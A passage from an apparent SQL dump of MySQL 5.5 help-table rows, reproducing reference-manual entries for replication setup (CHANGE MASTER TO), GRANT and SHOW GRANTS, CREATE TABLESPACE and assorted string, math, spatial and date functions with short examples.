ensures that there is no discontinuity in\nreplication, even if the slave SQL thread was late compared to the\nslave I/O thread, when you merely want to change, say, the password to\nuse.\n\nCHANGE MASTER TO deletes all relay log files and starts a new one,\nunless you specify RELAY_LOG_FILE or RELAY_LOG_POS. In that case, relay\nlog files are kept; the relay_log_purge global variable is set silently\nto 0.\n\nPrior to MySQL 5.5, RELAY_LOG_FILE required an absolute path. In MySQL\n5.5, the path can be relative, in which case the path is assumed to be\nrelative to the slave\'s data directory. (Bug #12190)\n\nIGNORE_SERVER_IDS was added in MySQL 5.5. This option takes a\ncomma-separated list of 0 or more server IDs. Events originating from\nthe corresponding servers are ignored, with the exception of log\nrotation and deletion events, which are still recorded in the relay\nlog.\n\nIn circular replication, the originating server normally acts as the\nterminator of its own events, so that they are not applied more than\nonce. Thus, this option is useful in circular replication when one of\nthe servers in the circle is removed. Suppose that you have a circular\nreplication setup with 4 servers, having server IDs 1, 2, 3, and 4, and\nserver 3 fails. When bridging the gap by starting replication from\nserver 2 to server 4, you can include IGNORE_SERVER_IDS = (3) in the\nCHANGE MASTER TO statement that you issue on server 4 to tell it to use\nserver 2 as its master instead of server 3. Doing so causes it to\nignore and not to propagate any statements that originated with the\nserver that is no longer in use.\n\nWhen a CHANGE MASTER TO statement is issued without any\nIGNORE_SERVER_IDS option, any existing list is preserved. To clear the\nlist of ignored servers, it is necessary to use the option with an\nempty list:\n\nCHANGE MASTER TO IGNORE_SERVER_IDS = ();\n\nRESET SLAVE ALL has no effect on the server ID list. This issue is\nfixed in MySQL 5.7. (Bug #18816897)\n\nIf IGNORE_SERVER_IDS contains the server\'s own ID and the server was\nstarted with the --replicate-same-server-id option enabled, an error\nresults.\n\nAlso beginning with MySQL 5.5, the master.info file and the output of\nSHOW SLAVE STATUS are extended to provide the list of servers that are\ncurrently ignored. For more information, see\nhttp://dev.mysql.com/doc/refman/5.5/en/slave-logs-status.html, and\n[HELP SHOW SLAVE STATUS].\n\nBeginning with MySQL 5.5.5, invoking CHANGE MASTER TO causes the\nprevious values for MASTER_HOST, MASTER_PORT, MASTER_LOG_FILE, and\nMASTER_LOG_POS to be written to the error log, along with other\ninformation about the slave\'s state prior to execution.\n\nCHANGE MASTER TO is useful for setting up a slave when you have the\nsnapshot of the master and have recorded the master binary log\ncoordinates corresponding to the time of the snapshot. After loading\nthe snapshot into the slave to synchronize it with the master, you can\nrun CHANGE MASTER TO MASTER_LOG_FILE=\'log_name\', MASTER_LOG_POS=log_pos\non the slave to specify the coordinates at which the slave should begin\nreading the master binary log.\n\nThe following example changes the master server the slave uses and\nestablishes the master binary log coordinates from which the slave\nbegins reading. This is used when you want to set up the slave to\nreplicate the master:\n\nCHANGE MASTER TO\n MASTER_HOST=\'master2.mycompany.com\',\n MASTER_USER=\'replication\',\n MASTER_PASSWORD=\'bigs3cret\',\n MASTER_PORT=3306,\n MASTER_LOG_FILE=\'master2-bin.001\',\n MASTER_LOG_POS=4,\n MASTER_CONNECT_RETRY=10;\n\nThe next example shows an operation that is less frequently employed.\nIt is used when the slave has relay log files that you want it to\nexecute again for some reason. To do this, the master need not be\nreachable. You need only use CHANGE MASTER TO and start the SQL thread\n(START SLAVE SQL_THREAD):\n\nCHANGE MASTER TO\n RELAY_LOG_FILE=\'slave-relay-bin.006\',\n RELAY_LOG_POS=4025;\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/change-master-to.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/change-master-to.html'),(186,'DROP DATABASE',40,'Syntax:\nDROP {DATABASE | SCHEMA} [IF EXISTS] db_name\n\nDROP DATABASE drops all tables in the database and deletes the\ndatabase. Be very careful with this statement! To use DROP DATABASE,\nyou need the DROP privilege on the database. DROP SCHEMA is a synonym\nfor DROP DATABASE.\n\n*Important*: When a database is dropped, user privileges on the\ndatabase are not automatically dropped. See [HELP GRANT].\n\nIF EXISTS is used to prevent an error from occurring if the database\ndoes not exist.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-database.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-database.html'),(187,'MBREQUAL',7,'MBREqual(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangles of\nthe two geometries g1 and g2 are the same.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(188,'TIMESTAMP FUNCTION',32,'Syntax:\nTIMESTAMP(expr), TIMESTAMP(expr1,expr2)\n\nWith a single argument, this function returns the date or datetime\nexpression expr as a datetime value. With two arguments, it adds the\ntime expression expr2 to the date or datetime expression expr1 and\nreturns the result as a datetime value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIMESTAMP(\'2003-12-31\');\n -> \'2003-12-31 00:00:00\'\nmysql> SELECT TIMESTAMP(\'2003-12-31 12:00:00\',\'12:00:00\');\n -> \'2004-01-01 00:00:00\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(189,'PROCEDURE ANALYSE',34,'Syntax:\nANALYSE([max_elements[,max_memory]])\n\nANALYSE() examines the result from a query and returns an analysis of\nthe results that suggests optimal data types for each column that may\nhelp reduce table sizes. To obtain this analysis, append PROCEDURE\nANALYSE to the end of a SELECT statement:\n\nSELECT ... FROM ... WHERE ... PROCEDURE ANALYSE([max_elements,[max_memory]])\n\nFor example:\n\nSELECT col1, col2 FROM table1 PROCEDURE ANALYSE(10, 2000);\n\nThe results show some statistics for the values returned by the query,\nand propose an optimal data type for the columns. This can be helpful\nfor checking your existing tables, or after importing new data. You may\nneed to try different settings for the arguments so that PROCEDURE\nANALYSE() does not suggest the ENUM data type when it is not\nappropriate.\n\nThe arguments are optional and are used as follows:\n\no max_elements (default 256) is the maximum number of distinct values\n that ANALYSE() notices per column. This is used by ANALYSE() to check\n whether the optimal data type should be of type ENUM; if there are\n more than max_elements distinct values, then ENUM is not a suggested\n type.\n\no max_memory (default 8192) is the maximum amount of memory that\n ANALYSE() should allocate per column while trying to find all\n distinct values.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/procedure-analyse.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/procedure-analyse.html'),(190,'HELP_VERSION',9,'This help information was generated from the MySQL 5.5 Reference Manual\non: 2015-09-18 (revision: 44619)\n\nThis information applies to MySQL 5.5 through 5.5.47.\n','',''),(191,'CHARACTER_LENGTH',38,'Syntax:\nCHARACTER_LENGTH(str)\n\nCHARACTER_LENGTH() is a synonym for CHAR_LENGTH().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(192,'SHOW GRANTS',27,'Syntax:\nSHOW GRANTS [FOR user]\n\nThis statement lists the GRANT statement or statements that must be\nissued to duplicate the privileges that are granted to a MySQL user\naccount. SHOW GRANTS requires the SELECT privilege for the mysql\ndatabase, except to see the privileges for the current user.\n\nThe account is named using the same format as for the GRANT statement;\nfor example, \'jeffrey\'@\'localhost\'. If you specify only the user name\npart of the account name, a host name part of \'%\' is used. For\nadditional information about specifying account names, see [HELP\nGRANT].\n\nmysql> SHOW GRANTS FOR \'root\'@\'localhost\';\n+---------------------------------------------------------------------+\n| Grants for root@localhost |\n+---------------------------------------------------------------------+\n| GRANT ALL PRIVILEGES ON *.* TO \'root\'@\'localhost\' WITH GRANT OPTION |\n+---------------------------------------------------------------------+\n\nTo list the privileges granted to the account that you are using to\nconnect to the server, you can use any of the following statements:\n\nSHOW GRANTS;\nSHOW GRANTS FOR CURRENT_USER;\nSHOW GRANTS FOR CURRENT_USER();\n\nIf SHOW GRANTS FOR CURRENT_USER (or any of the equivalent syntaxes) is\nused in DEFINER context, such as within a stored procedure that is\ndefined with SQL SECURITY DEFINER), the grants displayed are those of\nthe definer and not the invoker.\n\nSHOW GRANTS displays only the privileges granted explicitly to the\nnamed account. Other privileges might be available to the account, but\nthey are not displayed. For example, if an anonymous account exists,\nthe named account might be able to use its privileges, but SHOW GRANTS\nwill not display them.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-grants.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-grants.html'),(193,'SHOW PRIVILEGES',27,'Syntax:\nSHOW PRIVILEGES\n\nSHOW PRIVILEGES shows the list of system privileges that the MySQL\nserver supports. The exact list of privileges depends on the version of\nyour server.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-privileges.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-privileges.html'),(194,'CREATE TABLESPACE',40,'Syntax:\nCREATE TABLESPACE tablespace_name\n ADD DATAFILE \'file_name\'\n USE LOGFILE GROUP logfile_group\n [EXTENT_SIZE [=] extent_size]\n [INITIAL_SIZE [=] initial_size]\n [AUTOEXTEND_SIZE [=] autoextend_size]\n [MAX_SIZE [=] max_size]\n [NODEGROUP [=] nodegroup_id]\n [WAIT]\n [COMMENT [=] comment_text]\n ENGINE [=] engine_name\n\nThis statement is used to create a tablespace, which can contain one or\nmore data files, providing storage space for tables. One data file is\ncreated and added to the tablespace using this statement. Additional\ndata files may be added to the tablespace by using the ALTER TABLESPACE\nstatement (see [HELP ALTER TABLESPACE]). For rules covering the naming\nof tablespaces, see\nhttp://dev.mysql.com/doc/refman/5.5/en/identifiers.html.\n\n*Note*: All MySQL Cluster Disk Data objects share the same namespace.\nThis means that each Disk Data object must be uniquely named (and not\nmerely each Disk Data object of a given type). For example, you cannot\nhave a tablespace and a log file group with the same name, or a\ntablespace and a data file with the same name.\n\nA log file group of one or more UNDO log files must be assigned to the\ntablespace to be created with the USE LOGFILE GROUP clause.\nlogfile_group must be an existing log file group created with CREATE\nLOGFILE GROUP (see [HELP CREATE LOGFILE GROUP]). Multiple tablespaces\nmay use the same log file group for UNDO logging.\n\nThe EXTENT_SIZE sets the size, in bytes, of the extents used by any\nfiles belonging to the tablespace. The default value is 1M. The minimum\nsize is 32K, and theoretical maximum is 2G, although the practical\nmaximum size depends on a number of factors. In most cases, changing\nthe extent size does not have any measurable effect on performance, and\nthe default value is recommended for all but the most unusual\nsituations.\n\nAn extent is a unit of disk space allocation. One extent is filled with\nas much data as that extent can contain before another extent is used.\nIn theory, up to 65,535 (64K) extents may used per data file; however,\nthe recommended maximum is 32,768 (32K). The recommended maximum size\nfor a single data file is 32G---that is, 32K extents x 1 MB per extent.\nIn addition, once an extent is allocated to a given partition, it\ncannot be used to store data from a different partition; an extent\ncannot store data from more than one partition. This means, for example\nthat a tablespace having a single datafile whose INITIAL_SIZE is 256 MB\nand whose EXTENT_SIZE is 128M has just two extents, and so can be used\nto store data from at most two different disk data table partitions.\n\nYou can see how many extents remain free in a given data file by\nquerying the INFORMATION_SCHEMA.FILES table, and so derive an estimate\nfor how much space remains free in the file. For further discussion and\nexamples, see http://dev.mysql.com/doc/refman/5.5/en/files-table.html.\n\nThe INITIAL_SIZE parameter sets the data file\'s total size in bytes.\nOnce the file has been created, its size cannot be changed; however,\nyou can add more data files to the tablespace using ALTER TABLESPACE\n... ADD DATAFILE. See [HELP ALTER TABLESPACE].\n\nINITIAL_SIZE is optional; its default value is 134217728 (128 MB).\n\nOn 32-bit systems, the maximum supported value for INITIAL_SIZE is\n4294967296 (4 GB). (Bug #29186)\n\nWhen setting EXTENT_SIZE, you may optionally follow the number with a\none-letter abbreviation for an order of magnitude, similar to those\nused in my.cnf. Generally, this is one of the letters M (for megabytes)\nor G (for gigabytes). In MySQL Cluster NDB 7.2.14 and later, these\nabbreviations are also supported when specifying INITIAL_SIZE as well.\n(Bug #13116514, Bug #16104705, Bug #62858)\n\nINITIAL_SIZE, EXTENT_SIZE, and UNDO_BUFFER_SIZE are subject to rounding\nas follows:\n\no EXTENT_SIZE and UNDO_BUFFER_SIZE are each rounded up to the nearest\n whole multiple of 32K.\n\no INITIAL_SIZE is rounded down to the nearest whole multiple of 32K.\n\n For data files, INITIAL_SIZE is subject to further rounding; the\n result just obtained is rounded up to the nearest whole multiple of\n EXTENT_SIZE (after any rounding).\n\nThe rounding just described is done explicitly, and a warning is issued\nby the MySQL Server when any such rounding is performed. The rounded\nvalues are also used by the NDB kernel for calculating\nINFORMATION_SCHEMA.FILES column values and other purposes. However, to\navoid an unexpected result, we suggest that you always use whole\nmultiples of 32K in specifying these options.\n\nAUTOEXTEND_SIZE, MAX_SIZE, NODEGROUP, WAIT, and COMMENT are parsed but\nignored, and so currently have no effect. These options are intended\nfor future expansion.\n\nThe ENGINE parameter determines the storage engine which uses this\ntablespace, with engine_name being the name of the storage engine.\nCurrently, engine_name must be one of the values NDB or NDBCLUSTER.\n\nWhen CREATE TABLESPACE is used with ENGINE = NDB, a tablespace and\nassociated data file are created on each Cluster data node. You can\nverify that the data files were created and obtain information about\nthem by querying the INFORMATION_SCHEMA.FILES table. For example:\n\nmysql> SELECT LOGFILE_GROUP_NAME, FILE_NAME, EXTRA\n -> FROM INFORMATION_SCHEMA.FILES\n -> WHERE TABLESPACE_NAME = \'newts\' AND FILE_TYPE = \'DATAFILE\';\n+--------------------+-------------+----------------+\n| LOGFILE_GROUP_NAME | FILE_NAME | EXTRA |\n+--------------------+-------------+----------------+\n| lg_3 | newdata.dat | CLUSTER_NODE=3 |\n| lg_3 | newdata.dat | CLUSTER_NODE=4 |\n+--------------------+-------------+----------------+\n2 rows in set (0.01 sec)\n\n(See http://dev.mysql.com/doc/refman/5.5/en/files-table.html.)\n\nCREATE TABLESPACE is useful only with Disk Data storage for MySQL\nCluster. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-cluster-disk-data.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-tablespace.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-tablespace.html'),(195,'INSERT FUNCTION',38,'Syntax:\nINSERT(str,pos,len,newstr)\n\nReturns the string str, with the substring beginning at position pos\nand len characters long replaced by the string newstr. Returns the\noriginal string if pos is not within the length of the string. Replaces\nthe rest of the string from position pos if len is not within the\nlength of the rest of the string. Returns NULL if any argument is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(196,'CRC32',3,'Syntax:\nCRC32(expr)\n\nComputes a cyclic redundancy check value and returns a 32-bit unsigned\nvalue. The result is NULL if the argument is NULL. The argument is\nexpected to be a string and (if possible) is treated as one if it is\nnot.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556\nmysql> SELECT CRC32(\'mysql\');\n -> 2501908538\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(197,'XOR',15,'Syntax:\nXOR\n\nLogical XOR. Returns NULL if either operand is NULL. For non-NULL\noperands, evaluates to 1 if an odd number of operands is nonzero,\notherwise 0 is returned.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html\n\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/logical-operators.html'),(198,'STARTPOINT',13,'StartPoint(ls)\n\nReturns the Point that is the start point of the LineString value ls.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html\n\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsText(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html'),(199,'GRANT',10,'Syntax:\nGRANT\n priv_type [(column_list)]\n [, priv_type [(column_list)]] ...\n ON [object_type] priv_level\n TO user_specification [, user_specification] ...\n [REQUIRE {NONE | ssl_option [[AND] ssl_option] ...}]\n [WITH {GRANT OPTION | resource_option} ...]\n\nGRANT PROXY ON user_specification\n TO user_specification [, user_specification] ...\n [WITH GRANT OPTION]\n\nobject_type: {\n TABLE\n | FUNCTION\n | PROCEDURE\n}\n\npriv_level: {\n *\n | *.*\n | db_name.*\n | db_name.tbl_name\n | tbl_name\n | db_name.routine_name\n}\n\nuser_specification:\n user [ auth_option ]\n\nauth_option: {\n IDENTIFIED BY \'auth_string\'\n | IDENTIFIED BY PASSWORD \'hash_string\'\n | IDENTIFIED WITH auth_plugin\n | IDENTIFIED WITH auth_plugin AS \'hash_string\'\n}\n\nssl_option: {\n SSL\n | X509\n | CIPHER \'cipher\'\n | ISSUER \'issuer\'\n | SUBJECT \'subject\'\n}\n\nresource_option: {\n | MAX_QUERIES_PER_HOUR count\n | MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n}\n\nThe GRANT statement grants privileges to MySQL user accounts. GRANT\nalso serves to specify other account characteristics such as use of\nsecure connections and limits on access to server resources.\n\nTo use GRANT, you must have the GRANT OPTION privilege, and you must\nhave the privileges that you are granting. When the read_only system\nvariable is enabled, GRANT additionally requires the SUPER privilege.\n\nThe REVOKE statement is related to GRANT and enables administrators to\nremove account privileges. See [HELP REVOKE].\n\nNormally, a database administrator first uses CREATE USER to create an\naccount, then GRANT to define its privileges and characteristics. For\nexample:\n\nCREATE USER \'jeffrey\'@\'localhost\' IDENTIFIED BY \'mypass\';\nGRANT ALL ON db1.* TO \'jeffrey\'@\'localhost\';\nGRANT SELECT ON db2.invoice TO \'jeffrey\'@\'localhost\';\nGRANT USAGE ON *.* TO \'jeffrey\'@\'localhost\' WITH MAX_QUERIES_PER_HOUR 90;\n\n*Note*: Examples shown here include no IDENTIFIED clause. It is assumed\nthat you establish passwords with CREATE USER at account-creation time\nto avoid creating insecure accounts.\n\nIf an account named in a GRANT statement does not already exist, GRANT\nmay create it under the conditions described later in the discussion of\nthe NO_AUTO_CREATE_USER SQL mode.\n\nFrom the mysql program, GRANT responds with Query OK, 0 rows affected\nwhen executed successfully. To determine what privileges result from\nthe operation, use SHOW GRANTS. See [HELP SHOW GRANTS].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/grant.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/grant.html'),(200,'DECLARE VARIABLE',24,'Syntax:\nDECLARE var_name [, var_name] ... type [DEFAULT value]\n\nThis statement declares local variables within stored programs. To\nprovide a default value for a variable, include a DEFAULT clause. The\nvalue can be specified as an expression; it need not be a constant. If\nthe DEFAULT clause is missing, the initial value is NULL.\n\nLocal variables are treated like stored routine parameters with respect\nto data type and overflow checking. See [HELP CREATE PROCEDURE].\n\nVariable declarations must appear before cursor or handler\ndeclarations.\n\nLocal variable names are not case sensitive. Permissible characters and\nquoting rules are the same as for other identifiers, as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/identifiers.html.\n\nThe scope of a local variable is the BEGIN ... END block within which\nit is declared. The variable can be referred to in blocks nested within\nthe declaring block, except those blocks that declare a variable with\nthe same name.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/declare-local-variable.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/declare-local-variable.html'),(201,'MPOLYFROMTEXT',4,'MPolyFromText(wkt[,srid]), MultiPolygonFromText(wkt[,srid])\n\nConstructs a MultiPolygon value using its WKT representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(202,'BIT_OR',16,'Syntax:\nBIT_OR(expr)\n\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(203,'MBRINTERSECTS',7,'MBRIntersects(g1,g2)\n\nReturns 1 or 0 to indicate whether the minimum bounding rectangles of\nthe two geometries g1 and g2 intersect.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mysql-specific.html'),(204,'YEARWEEK',32,'Syntax:\nYEARWEEK(date), YEARWEEK(date,mode)\n\nReturns year and week for a date. The mode argument works exactly like\nthe mode argument to WEEK(). The year in the result may be different\nfrom the year in the date argument for the first and the last week of\nthe year.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(205,'NOT BETWEEN',20,'Syntax:\nexpr NOT BETWEEN min AND max\n\nThis is the same as NOT (expr BETWEEN min AND max).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(206,'IS NOT',20,'Syntax:\nIS NOT boolean_value\n\nTests a value against a boolean value, where boolean_value can be TRUE,\nFALSE, or UNKNOWN.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 1 IS NOT UNKNOWN, 0 IS NOT UNKNOWN, NULL IS NOT UNKNOWN;\n -> 1, 1, 0\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(207,'LOG10',3,'Syntax:\nLOG10(X)\n\nReturns the base-10 logarithm of X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT LOG10(2);\n -> 0.30102999566398\nmysql> SELECT LOG10(100);\n -> 2\nmysql> SELECT LOG10(-100);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(208,'SQRT',3,'Syntax:\nSQRT(X)\n\nReturns the square root of a nonnegative number X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT SQRT(4);\n -> 2\nmysql> SELECT SQRT(20);\n -> 4.4721359549996\nmysql> SELECT SQRT(-16);\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(209,'DECIMAL',23,'DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nA packed \"exact\" fixed-point number. M is the total number of digits\n(the precision) and D is the number of digits after the decimal point\n(the scale). The decimal point and (for negative numbers) the \"-\" sign\nare not counted in M. If D is 0, values have no decimal point or\nfractional part. The maximum number of digits (M) for DECIMAL is 65.\nThe maximum number of supported decimals (D) is 30. If D is omitted,\nthe default is 0. If M is omitted, the default is 10.\n\nUNSIGNED, if specified, disallows negative values.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are done with\na precision of 65 digits.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(210,'CREATE INDEX',40,'Syntax:\nCREATE [ONLINE|OFFLINE] [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [index_type]\n ON tbl_name (index_col_name,...)\n [index_option] ...\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]\n\nindex_type:\n USING {BTREE | HASH}\n\nindex_option:\n KEY_BLOCK_SIZE [=] value\n | index_type\n | WITH PARSER parser_name\n | COMMENT \'string\'\n\nCREATE INDEX is mapped to an ALTER TABLE statement to create indexes.\nSee [HELP ALTER TABLE]. CREATE INDEX cannot be used to create a PRIMARY\nKEY; use ALTER TABLE instead. For more information about indexes, see\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-indexes.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-index.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-index.html'),(211,'CREATE FUNCTION',40,'The CREATE FUNCTION statement is used to create stored functions and\nuser-defined functions (UDFs):\n\no For information about creating stored functions, see [HELP CREATE\n PROCEDURE].\n\no For information about creating user-defined functions, see [HELP\n CREATE FUNCTION UDF].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-function.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-function.html'),(212,'ALTER DATABASE',40,'Syntax:\nALTER {DATABASE | SCHEMA} [db_name]\n alter_specification ...\nALTER {DATABASE | SCHEMA} db_name\n UPGRADE DATA DIRECTORY NAME\n\nalter_specification:\n [DEFAULT] CHARACTER SET [=] charset_name\n | [DEFAULT] COLLATE [=] collation_name\n\nALTER DATABASE enables you to change the overall characteristics of a\ndatabase. These characteristics are stored in the db.opt file in the\ndatabase directory. To use ALTER DATABASE, you need the ALTER privilege\non the database. ALTER SCHEMA is a synonym for ALTER DATABASE.\n\nThe database name can be omitted from the first syntax, in which case\nthe statement applies to the default database.\n\nNational Language Characteristics\n\nThe CHARACTER SET clause changes the default database character set.\nThe COLLATE clause changes the default database collation.\nhttp://dev.mysql.com/doc/refman/5.5/en/charset.html, discusses\ncharacter set and collation names.\n\nYou can see what character sets and collations are available using,\nrespectively, the SHOW CHARACTER SET and SHOW COLLATION statements. See\n[HELP SHOW CHARACTER SET], and [HELP SHOW COLLATION], for more\ninformation.\n\nIf you change the default character set or collation for a database,\nstored routines that use the database defaults must be dropped and\nrecreated so that they use the new defaults. (In a stored routine,\nvariables with character data types use the database defaults if the\ncharacter set or collation are not specified explicitly. See [HELP\nCREATE PROCEDURE].)\n\nUpgrading from Versions Older than MySQL 5.1\n\nThe syntax that includes the UPGRADE DATA DIRECTORY NAME clause updates\nthe name of the directory associated with the database to use the\nencoding implemented in MySQL 5.1 for mapping database names to\ndatabase directory names (see\nhttp://dev.mysql.com/doc/refman/5.5/en/identifier-mapping.html). This\nclause is for use under these conditions:\n\no It is intended when upgrading MySQL to 5.1 or later from older\n versions.\n\no It is intended to update a database directory name to the current\n encoding format if the name contains special characters that need\n encoding.\n\no The statement is used by mysqlcheck (as invoked by mysql_upgrade).\n\nFor example, if a database in MySQL 5.0 has the name a-b-c, the name\ncontains instances of the - (dash) character. In MySQL 5.0, the\ndatabase directory is also named a-b-c, which is not necessarily safe\nfor all file systems. In MySQL 5.1 and later, the same database name is\nencoded as a@002db@002dc to produce a file system-neutral directory\nname.\n\nWhen a MySQL installation is upgraded to MySQL 5.1 or later from an\nolder version,the server displays a name such as a-b-c (which is in the\nold format) as #mysql50#a-b-c, and you must refer to the name using the\n#mysql50# prefix. Use UPGRADE DATA DIRECTORY NAME in this case to\nexplicitly tell the server to re-encode the database directory name to\nthe current encoding format:\n\nALTER DATABASE `#mysql50#a-b-c` UPGRADE DATA DIRECTORY NAME;\n\nAfter executing this statement, you can refer to the database as a-b-c\nwithout the special #mysql50# prefix.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-database.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-database.html'),(213,'GEOMETRYN',26,'GeometryN(gc,N)\n\nReturns the N-th geometry in the GeometryCollection value gc.\nGeometries are numbered beginning with 1.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-geometrycollection-property-functions.html\n\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+----------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-geometrycollection-property-functions.html'),(214,'<<',19,'Syntax:\n<<\n\nShifts a longlong (BIGINT) number to the left.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT 1 << 2;\n -> 4\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(215,'SHOW TABLE STATUS',27,'Syntax:\nSHOW TABLE STATUS [{FROM | IN} db_name]\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW TABLE STATUS works likes SHOW TABLES, but provides a lot of\ninformation about each non-TEMPORARY table. You can also get this list\nusing the mysqlshow --status db_name command. The LIKE clause, if\npresent, indicates which table names to match. The WHERE clause can be\ngiven to select rows using more general conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-table-status.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-table-status.html'),(216,'MD5',12,'Syntax:\nMD5(str)\n\nCalculates an MD5 128-bit checksum for the string. The value is\nreturned as a string of 32 hex digits, or NULL if the argument was\nNULL. The return value can, for example, be used as a hash key. See the\nnotes at the beginning of this section about storing hash values\nefficiently.\n\nAs of MySQL 5.5.3, the return value is a nonbinary string in the\nconnection character set. Before 5.5.3, the return value is a binary\nstring; see the notes at the beginning of this section about using the\nvalue as a nonbinary string.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT MD5(\'testing\');\n -> \'ae2b1fca515949e5d54fb22b8ed95575\'\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(217,'<',20,'Syntax:\n<\n\nLess than:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 2 < 2;\n -> 